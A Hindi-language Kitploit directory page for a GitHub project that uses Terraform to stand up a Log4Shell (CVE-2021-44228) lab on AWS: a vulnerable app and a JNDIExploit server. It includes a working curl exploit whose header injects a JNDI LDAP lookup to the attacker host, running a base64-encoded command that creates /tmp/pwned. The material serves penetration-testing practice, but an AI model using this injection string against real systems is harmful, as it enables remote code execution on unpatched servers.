Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-vulnerable-app-cve-2021-44228-terraform — एक कमजोर ऐप को तैनात करने के लिए Terraform और CVE-2021-44228 के साथ काम करने के लिए JDNIExploit | Kitploit
उपकरण/GitHubGitHub/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
क्लाउड इन्फ्रास्ट्रक्चर सुरक्षापेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubmkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform

log4j-vulnerable-app-cve-2021-44228-terraform

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

एक कमजोर ऐप को तैनात करने के लिए Terraform और CVE-2021-44228 के साथ काम करने के लिए JDNIExploit

रिपॉजिटरी देखें
21184 साल पहलेअभी तक समीक्षित नहीं
साझा करें

log4j-vulnerable-app-cve-2021-44228-terraform

एक Terraform जो कमजोर ऐप और CVE-2021-44228 के साथ काम करने के लिए JNDIExploit को तैनात करता है

स्टैक के बारे में

यह Terraform AWS Cloud में एक VPC पर दो इंस्टेंस बनाता है।

आपको बस अपनी AWS_ACCESS_KEY_ID और AWS_SECRET_ACCESS_KEY को export करने की आवश्यकता है।

एक इंस्टेंस JNDIExploit है।

दूसरा Vulnerable-App है जो log4j शोषण के लिए है।

कृपया आवेदन करने से पहले terraform में अपनी SSH-Public-Key को बदल दें

terraform init
terraform plan
terraform apply --auto-approve

शोषण

AWS पर तैनाती के बाद आप इसे curl अनुरोध से शोषित कर सकते हैं, और vulnerable-app कंटेनर पर /tmp में फ़ाइल निर्माण सत्यापित कर सकते हैं।

curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

vulnerable app सर्वर पर निम्न कमांड चलाएँ ताकि कमांड निष्पादन सत्यापित हो सके, आपको pwned फ़ाइल देखनी चाहिए।

sudo docker exec -ti vulnerable-app ls /tmp
टूल डाउनलोड करें